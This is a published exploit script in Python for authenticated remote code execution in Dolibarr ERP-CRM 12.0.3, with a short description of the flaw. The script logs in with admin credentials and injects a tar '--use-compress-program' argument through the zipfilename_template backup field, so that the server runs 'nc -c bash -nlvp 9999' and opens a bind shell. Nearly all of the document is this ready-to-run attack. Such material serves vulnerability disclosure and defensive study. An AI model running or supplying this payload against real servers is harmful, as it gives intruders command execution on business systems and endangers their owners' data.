Dolibarr ERP-CRM 12.0.3 Remote Code Execution

`# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)  
# Date: 2020.12.17  
# Exploit Author: Yilmaz Degirmenci  
# Vendor Homepage: https://github.com/Dolibarr/dolibarr  
# Software Link: https://sourceforge.net/projects/dolibarr/  
# Version: 12.0.3  
# Tested on: Kali Linux 2020.2  
  
# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is  
# vulnerable to authenticated Remote Code Execution Attack. An attacker who  
# has the access the admin dashboard can manipulate the backup function by  
# inserting payload into the zipfilename_template parameter at page  
# /admin/tools/dolibarr_export.php by clicking on the button "Generate  
# Backup" thus triggering command injection on target system.  
  
import requests  
from bs4 import BeautifulSoup  
from bs4 import Comment  
import re  
import lxml  
import json  
import urllib  
  
username = input("username: ")  
password = input("password: ")  
root_url = input("Root URL: http://192.168.0.15/ --> ")  
  
print("Exploit is sent! Check out if the bind shell on port 9999 active!")  
  
listener_port = "9999"  
  
login_url = root_url + "/index.php?mainmenu=home "  
vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"  
upload_url = root_url + "/admin/tools/export_files.php"  
  
session = requests.Session()  
request = session.get(login_url)  
  
# Get the token value  
soup = BeautifulSoup(request.text,"lxml")  
token = soup.find("input",{'name':'token'})['value']  
  
# Login  
body = {"token":token, "actionlogin":"login",  
"loginfunction":"loginfunction", "tz":"-5",  
"tz_string":"America%2FNew_York", "dst_observed":"1",  
"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":  
"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",  
"dol_hide_topmenu":"", "dol_hide_leftmenu":"",  
"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",  
"dol_use_jmobile":"", "username":username,"password":password}  
  
session.post(login_url, data=body, cookies=request.cookies)  
  
request = session.get(vulnerable_url)  
token = soup.find("input",{'name':'token'})['value']  
  
header = {  
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)  
Gecko/20100101 Firefox/80.0",  
"Accept":"*/",  
"Accept-Encoding": "gzip, deflate",  
"Origin": root_url,  
"Referer":  
root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",  
"Upgrade-Insecure-Requests": "1"  
}  
  
body = {"token":token, "export_type":"server", "page_y":"1039",  
"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar  
--use-compress-program='nc -c bash -nlvp 9999' %0a :: ",  
"compression":"gz"}  
  
param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)  
  
session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)  
`